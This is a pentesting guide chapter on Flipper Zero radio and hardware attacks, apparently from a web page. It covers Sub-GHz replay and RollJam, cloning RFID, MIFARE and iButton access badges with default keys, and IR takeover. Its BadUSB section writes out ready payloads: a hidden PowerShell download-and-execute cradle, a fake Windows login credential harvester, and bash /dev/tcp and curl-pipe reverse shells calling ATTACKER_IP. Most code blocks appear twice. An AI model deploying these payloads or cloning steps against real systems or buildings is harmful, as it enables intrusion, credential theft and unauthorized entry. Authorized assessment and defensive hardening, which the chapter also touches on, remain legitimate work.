Section 07
⚡ Intermediate
Flipper Zero & RF Ops
The Flipper Zero is the Swiss Army knife of physical security assessments — Sub-GHz radio, RFID/NFC, infrared, GPIO, and BadUSB packaged for pocket carry. This chapter covers the complete operator workflow: firmware selection, signal capture, credential cloning, and assessment integration.
Legal Notice
Only use these techniques on systems you own or have explicit written authorization to test.
Unauthorized access to computer systems and radio transmissions may violate federal and local laws.
Firmware Options
Custom firmware extends Flipper Zero capabilities significantly. Choose based on your needs:
| Firmware | Features | Best For |
|---|---|---|
| Official | Stable, legal frequencies only | Beginners, compliance |
| Unleashed | Unlocked frequencies, extra apps | Security researchers |
| RogueMaster | Most apps, animations, unlocked | Maximum functionality |
| Xtreme | Customization, asset packs | Customization enthusiasts |
bash
# Install qFlipper (official desktop app)
# Download from: https://flipperzero.one/update
# Update via qFlipper
# Connect Flipper > Click "Update" > Select firmware
# Install custom firmware via qFlipper
# 1. Download .tgz firmware file
# 2. qFlipper > Install from file > Select .tgz
# Useful firmware repositories
https://github.com/DarkFlippers/unleashed-firmware
https://github.com/RogueMaster/flipperzero-firmware-wPlugins
https://github.com/Flipper-XFW/Xtreme-Firmware# Install qFlipper (official desktop app)
# Download from: https://flipperzero.one/update
# Update via qFlipper
# Connect Flipper > Click "Update" > Select firmware
# Install custom firmware via qFlipper
# 1. Download .tgz firmware file
# 2. qFlipper > Install from file > Select .tgz
# Useful firmware repositories
https://github.com/DarkFlippers/unleashed-firmware
https://github.com/RogueMaster/flipperzero-firmware-wPlugins
https://github.com/Flipper-XFW/Xtreme-FirmwareSub-GHz Radio Attacks
The Sub-GHz module can capture, analyze, and replay radio signals from 300-928 MHz. Common targets include garage doors, gates, car key fobs, and wireless sensors.
Signal Capture & Replay
bash
# Sub-GHz Menu Navigation
Main Menu > Sub-GHz > Read
# Capture unknown signals (RAW mode)
Sub-GHz > Read RAW
# Press button on target remote
# Save captured signal
# Replay captured signal
Sub-GHz > Saved > [signal_name] > Send
# Frequency Analyzer (find active frequency)
Sub-GHz > Frequency Analyzer
# Useful range: 300-928 MHz
# Common frequencies:
# 315 MHz - North America (garage, car fobs)
# 433.92 MHz - Europe/Asia (remotes, sensors)
# 868 MHz - Europe (smart home, alarms)
# 915 MHz - North America (LoRa, smart meters)
# Add custom frequencies
# Edit: SD Card/subghz/assets/setting_user# Sub-GHz Menu Navigation
Main Menu > Sub-GHz > Read
# Capture unknown signals (RAW mode)
Sub-GHz > Read RAW
# Press button on target remote
# Save captured signal
# Replay captured signal
Sub-GHz > Saved > [signal_name] > Send
# Frequency Analyzer (find active frequency)
Sub-GHz > Frequency Analyzer
# Useful range: 300-928 MHz
# Common frequencies:
# 315 MHz - North America (garage, car fobs)
# 433.92 MHz - Europe/Asia (remotes, sensors)
# 868 MHz - Europe (smart home, alarms)
# 915 MHz - North America (LoRa, smart meters)
# Add custom frequencies
# Edit: SD Card/subghz/assets/setting_userRolling Code Analysis
Rolling Codes
Modern garage doors and car key fobs use rolling codes that change with each use.
Simple replay attacks won't work. Advanced techniques include RollJam and signal jamming.
bash
# Static vs Rolling Codes
# Static: Same code every time (older systems) - Easy to clone
# Rolling: Code changes each transmission - Requires advanced attacks
# Identifying code type
Sub-GHz > Read > Capture multiple presses
# If codes are identical = Static (vulnerable)
# If codes change = Rolling (protected)
# Common static code protocols (vulnerable)
- Princeton
- CAME 12/24 bit
- Linear
- Nice FLO
- Gate TX
# Rolling code protocols (protected)
- Keeloq (most garage doors)
- CAME Atomo
- Nice Flor-S
- Starline
# RollJam Attack (requires additional hardware)
# 1. Jam target frequency while capturing
# 2. Victim presses button - you capture, they fail
# 3. Victim presses again - you capture second code
# 4. Release jam, replay first code
# 5. You now have one valid unused code# Static vs Rolling Codes
# Static: Same code every time (older systems) - Easy to clone
# Rolling: Code changes each transmission - Requires advanced attacks
# Identifying code type
Sub-GHz > Read > Capture multiple presses
# If codes are identical = Static (vulnerable)
# If codes change = Rolling (protected)
# Common static code protocols (vulnerable)
- Princeton
- CAME 12/24 bit
- Linear
- Nice FLO
- Gate TX
# Rolling code protocols (protected)
- Keeloq (most garage doors)
- CAME Atomo
- Nice Flor-S
- Starline
# RollJam Attack (requires additional hardware)
# 1. Jam target frequency while capturing
# 2. Victim presses button - you capture, they fail
# 3. Victim presses again - you capture second code
# 4. Release jam, replay first code
# 5. You now have one valid unused codeRFID/NFC Attacks
125 kHz (Low Frequency)
bash
# Read LF cards (125 kHz)
Main Menu > 125 kHz RFID > Read
# Common 125 kHz card types:
# - EM4100 (EM-Marin) - Most common, easy to clone
# - HID Prox - Corporate access cards
# - Indala - Government/secure facilities
# - AWID - Access control systems
# Clone to T5577 card
125 kHz RFID > Saved > [card] > Write
# Emulate card (be the badge)
125 kHz RFID > Saved > [card] > Emulate
# Add manually if you know the ID
125 kHz RFID > Add Manually > [Select type]
# Enter Facility Code + Card Number
# Brute force (if you know partial info)
125 kHz RFID > Extra Actions > [protocol] Brute Force# Read LF cards (125 kHz)
Main Menu > 125 kHz RFID > Read
# Common 125 kHz card types:
# - EM4100 (EM-Marin) - Most common, easy to clone
# - HID Prox - Corporate access cards
# - Indala - Government/secure facilities
# - AWID - Access control systems
# Clone to T5577 card
125 kHz RFID > Saved > [card] > Write
# Emulate card (be the badge)
125 kHz RFID > Saved > [card] > Emulate
# Add manually if you know the ID
125 kHz RFID > Add Manually > [Select type]
# Enter Facility Code + Card Number
# Brute force (if you know partial info)
125 kHz RFID > Extra Actions > [protocol] Brute Force13.56 MHz (High Frequency NFC)
bash
# Read NFC cards
Main Menu > NFC > Read
# Common NFC card types:
# - MIFARE Classic (1K/4K) - Transit, access (weak crypto)
# - MIFARE Ultralight - Event tickets, transit
# - MIFARE DESFire - High security access
# - NTAG21x - NFC tags, smart posters
# - iCLASS - HID high security
# MIFARE Classic attacks
NFC > Read > [Detect card]
# Flipper attempts automatic key recovery
# Uses dictionary attack + hardnested attack
# Save and emulate
NFC > Saved > [card] > Emulate
# Extract keys (if attack succeeds)
# Keys saved in .nfc file on SD card
# Write to Magic MIFARE card (Gen1a/Gen2)
NFC > Saved > [card] > Write
# Manual key entry
# Edit .nfc file to add known keys
# Common default keys:
# FFFFFFFFFFFF (factory default)
# A0A1A2A3A4A5 (MAD key)
# D3F7D3F7D3F7 (NFC Forum)# Read NFC cards
Main Menu > NFC > Read
# Common NFC card types:
# - MIFARE Classic (1K/4K) - Transit, access (weak crypto)
# - MIFARE Ultralight - Event tickets, transit
# - MIFARE DESFire - High security access
# - NTAG21x - NFC tags, smart posters
# - iCLASS - HID high security
# MIFARE Classic attacks
NFC > Read > [Detect card]
# Flipper attempts automatic key recovery
# Uses dictionary attack + hardnested attack
# Save and emulate
NFC > Saved > [card] > Emulate
# Extract keys (if attack succeeds)
# Keys saved in .nfc file on SD card
# Write to Magic MIFARE card (Gen1a/Gen2)
NFC > Saved > [card] > Write
# Manual key entry
# Edit .nfc file to add known keys
# Common default keys:
# FFFFFFFFFFFF (factory default)
# A0A1A2A3A4A5 (MAD key)
# D3F7D3F7D3F7 (NFC Forum)Infrared Attacks
bash
# Infrared capabilities
Main Menu > Infrared
# Universal Remotes (built-in)
Infrared > Universal Remotes
# TVs, ACs, Projectors, Audio systems
# Useful for: conference room takeover, TV-B-Gone
# Learn new remote
Infrared > Learn New Remote
# Point remote at Flipper, press buttons
# Save each button with descriptive name
# Brute force TV codes
Infrared > Universal Remotes > TVs
# Cycles through known power codes
# Useful for turning off public displays
# Custom IR files
# Download IR databases:
# https://github.com/logickworkshop/Flipper-IRDB
# Copy to: SD Card/infrared/
# IR Blaster range
# Built-in: ~3 meters
# With IR blaster module: 15+ meters# Infrared capabilities
Main Menu > Infrared
# Universal Remotes (built-in)
Infrared > Universal Remotes
# TVs, ACs, Projectors, Audio systems
# Useful for: conference room takeover, TV-B-Gone
# Learn new remote
Infrared > Learn New Remote
# Point remote at Flipper, press buttons
# Save each button with descriptive name
# Brute force TV codes
Infrared > Universal Remotes > TVs
# Cycles through known power codes
# Useful for turning off public displays
# Custom IR files
# Download IR databases:
# https://github.com/logickworkshop/Flipper-IRDB
# Copy to: SD Card/infrared/
# IR Blaster range
# Built-in: ~3 meters
# With IR blaster module: 15+ metersBadUSB Attacks
BadUSB turns the Flipper into a malicious keyboard that types pre-programmed payloads. Uses DuckyScript syntax compatible with USB Rubber Ducky.
bash
# BadUSB location
Main Menu > Bad USB
# Payload location on SD card
SD Card/badusb/
# Basic DuckyScript syntax
DELAY 1000 # Wait 1 second (ms)
STRING Hello World # Type text
ENTER # Press Enter
GUI r # Windows+R (Run dialog)
ALT F4 # Close window
CTRL ALT DELETE # Ctrl+Alt+Del
# Windows reverse shell payload
REM Open PowerShell and download/execute payload
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')
ENTER
# Windows credential harvester
REM Fake Windows login prompt
DELAY 1000
GUI r
DELAY 300
STRING powershell -w hidden -ep bypass
ENTER
DELAY 500
STRING Add-Type -AssemblyName System.Windows.Forms;$c=[System.Windows.Forms.MessageBox]::Show('Your session has expired. Please re-enter your credentials.','Windows Security',4);$cred=Get-Credential;$cred.GetNetworkCredential()|fl *|Out-File $env:TEMPcreds.txt
ENTER
# Linux reverse shell
DELAY 1000
CTRL ALT t
DELAY 500
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
ENTER
# Mac payload
DELAY 1000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 500
STRING curl http://ATTACKER_IP/payload.sh | bash
ENTER# BadUSB location
Main Menu > Bad USB
# Payload location on SD card
SD Card/badusb/
# Basic DuckyScript syntax
DELAY 1000 # Wait 1 second (ms)
STRING Hello World # Type text
ENTER # Press Enter
GUI r # Windows+R (Run dialog)
ALT F4 # Close window
CTRL ALT DELETE # Ctrl+Alt+Del
# Windows reverse shell payload
REM Open PowerShell and download/execute payload
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')
ENTER
# Windows credential harvester
REM Fake Windows login prompt
DELAY 1000
GUI r
DELAY 300
STRING powershell -w hidden -ep bypass
ENTER
DELAY 500
STRING Add-Type -AssemblyName System.Windows.Forms;$c=[System.Windows.Forms.MessageBox]::Show('Your session has expired. Please re-enter your credentials.','Windows Security',4);$cred=Get-Credential;$cred.GetNetworkCredential()|fl *|Out-File $env:TEMPcreds.txt
ENTER
# Linux reverse shell
DELAY 1000
CTRL ALT t
DELAY 500
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
ENTER
# Mac payload
DELAY 1000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 500
STRING curl http://ATTACKER_IP/payload.sh | bash
ENTERGPIO & Hardware
bash
# GPIO Pin capabilities
Main Menu > GPIO
# Connect external modules:
# - WiFi Devboard (ESP32) - WiFi attacks, deauth
# - CC1101 module - Extended Sub-GHz range
# - NRF24 module - 2.4GHz attacks (MouseJack)
# - Proxmark3 - Advanced RFID (via UART)
# WiFi Devboard attacks (with Marauder firmware)
# - Beacon spam
# - Deauthentication
# - Probe request sniffing
# - Evil portal
# - Packet capture
# UART Bridge (connect to devices)
GPIO > USB-UART Bridge
# Useful for:
# - Router console access
# - IoT device debugging
# - Embedded system hacking
# GPIO pinout (directly usable)
# 3.3V, 5V, GND, TX, RX, and more
# Read sensors, control devices# GPIO Pin capabilities
Main Menu > GPIO
# Connect external modules:
# - WiFi Devboard (ESP32) - WiFi attacks, deauth
# - CC1101 module - Extended Sub-GHz range
# - NRF24 module - 2.4GHz attacks (MouseJack)
# - Proxmark3 - Advanced RFID (via UART)
# WiFi Devboard attacks (with Marauder firmware)
# - Beacon spam
# - Deauthentication
# - Probe request sniffing
# - Evil portal
# - Packet capture
# UART Bridge (connect to devices)
GPIO > USB-UART Bridge
# Useful for:
# - Router console access
# - IoT device debugging
# - Embedded system hacking
# GPIO pinout (directly usable)
# 3.3V, 5V, GND, TX, RX, and more
# Read sensors, control devicesiButton / 1-Wire
bash
# iButton (Dallas keys / 1-Wire)
Main Menu > iButton
# Common uses:
# - Building access
# - Elevator control
# - Time clocks
# - Guard tour systems
# Read iButton
iButton > Read
# Touch key to Flipper's iButton contacts
# Common iButton types:
# - DS1990A (ROM only) - Easy to clone
# - DS1982 (EEPROM) - Stores data
# - DS1961S (SHA-1) - Cryptographic
# Clone to RW1990 blank
iButton > Saved > [key] > Write
# Requires RW1990 writable key
# Emulate
iButton > Saved > [key] > Emulate
# Hold Flipper to reader# iButton (Dallas keys / 1-Wire)
Main Menu > iButton
# Common uses:
# - Building access
# - Elevator control
# - Time clocks
# - Guard tour systems
# Read iButton
iButton > Read
# Touch key to Flipper's iButton contacts
# Common iButton types:
# - DS1990A (ROM only) - Easy to clone
# - DS1982 (EEPROM) - Stores data
# - DS1961S (SHA-1) - Cryptographic
# Clone to RW1990 blank
iButton > Saved > [key] > Write
# Requires RW1990 writable key
# Emulate
iButton > Saved > [key] > Emulate
# Hold Flipper to readerUseful Apps & Resources
bash
# Essential Flipper apps (install via qFlipper or web)
- Marauder (WiFi attacks - requires devboard)
- DTMF Dolphin (phone tones)
- Barcode Generator
- QR Code
- GPS (with module)
- Geiger Counter (with module)
# SD Card structure for assets
SD Card/
├── badusb/ # DuckyScript payloads
├── infrared/ # IR remote files
├── nfc/ # NFC card dumps
├── subghz/ # Sub-GHz captures
├── lfrfid/ # 125kHz card data
├── ibutton/ # iButton dumps
└── apps_data/ # App-specific data
# Useful databases
https://github.com/UberGuidoZ/Flipper # Massive collection
https://github.com/logickworkshop/Flipper-IRDB # IR remotes
https://github.com/Gioman101/FlipperAmi # Amiibo collection
# Update databases
# Download repos, copy relevant folders to SD card
# Discord communities
Flipper Devices (Official)
Flipper Zero Unofficial# Essential Flipper apps (install via qFlipper or web)
- Marauder (WiFi attacks - requires devboard)
- DTMF Dolphin (phone tones)
- Barcode Generator
- QR Code
- GPS (with module)
- Geiger Counter (with module)
# SD Card structure for assets
SD Card/
├── badusb/ # DuckyScript payloads
├── infrared/ # IR remote files
├── nfc/ # NFC card dumps
├── subghz/ # Sub-GHz captures
├── lfrfid/ # 125kHz card data
├── ibutton/ # iButton dumps
└── apps_data/ # App-specific data
# Useful databases
https://github.com/UberGuidoZ/Flipper # Massive collection
https://github.com/logickworkshop/Flipper-IRDB # IR remotes
https://github.com/Gioman101/FlipperAmi # Amiibo collection
# Update databases
# Download repos, copy relevant folders to SD card
# Discord communities
Flipper Devices (Official)
Flipper Zero UnofficialPhysical Pentest Workflow
- Reconnaissance - Identify target access control systems (card type, frequency, brand)
- Frequency Analysis - Use Sub-GHz analyzer to find active frequencies
- Badge Cloning - Read employee badges via proximity (in elevator, cafeteria)
- Signal Capture - Capture garage/gate signals if applicable
- IR Capture - Learn conference room AV controls
- Payload Prep - Prepare BadUSB payloads for target OS
- Execution - Use captured credentials and payloads during engagement
- Documentation - Screenshot/photo all successful attacks for report
Operator Tips
- Keep firmware updated for latest protocol support
- Carry spare T5577 and Magic MIFARE cards
- Test payloads in lab before engagement
- Document card UID/FC/CN for report evidence
- Use airplane mode when not actively testing to conserve battery
What Strong Defenders Do Differently
Defensive Signals
- • DESFire EV2/EV3 or SEOS credentials that resist cloning
- • OSDP Secure Channel readers with encrypted back-haul
- • Rolling-code garage and gate systems (KeeLoq, CAME Atomo)
- • USB port Group Policy blocking BadUSB execution
- • RF monitoring / WIDS that detects rogue Sub-GHz devices
High-Risk Signals
- • EM4100 or HID 125 kHz Prox still deployed on perimeter doors
- • Static-code garage remotes that replay instantly
- • MIFARE Classic cards with factory-default keys
- • No USB device-control policy on shared workstations
- • IR-controlled AV gear in unsupervised conference rooms
🛠️ Recommended Tools
🐬
Flipper Zero
The essential multi-tool for physical pentesting — Sub-GHz, NFC/RFID, IR, BadUSB, iButton, and GPIO in one pocket-sized device.
📻
HackRF One
Wideband SDR (1 MHz – 6 GHz) for deep RF analysis, spectrum monitoring, and signal replay beyond Flipper's Sub-GHz range.
Related Topics
As an Amazon Associate I earn from qualifying purchases.